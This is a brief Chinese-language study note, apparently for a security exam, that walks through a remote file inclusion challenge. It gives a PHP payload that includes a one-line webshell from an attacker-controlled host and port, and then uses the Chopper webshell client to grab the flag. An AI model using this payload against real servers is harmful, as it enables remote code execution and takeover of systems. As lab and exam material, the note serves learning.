远程文件包含虽然没有弄到靶场,但是备考学习的时候不能不重视,毕竟谁也不知道,即将面临的考试碰到的是什么样的题型。可以参考下网上公开分享的资料。
题目是这样的:
不管啥url后面都给你加了个.txt,想到应该是用远程文件包含做
这里需要用到的知识就是利用python可以轻易在本地开一个服务器:如果有不知道怎么开的可以参考下面这里
在服务器所在的目录下写一个shell.txt,内容如下
<?php echo(“hi”); Include(“http://<攻击机ip>:<攻击机开的端口>/wen.php”); echo(“bye”); ?>,其中wen.php为一个一句话木马。
访问:page=http://<攻击机ip>:<攻击机开的端口>/shell,即可看到shell.txt已经被php解析了,用菜刀链接即可获得key。
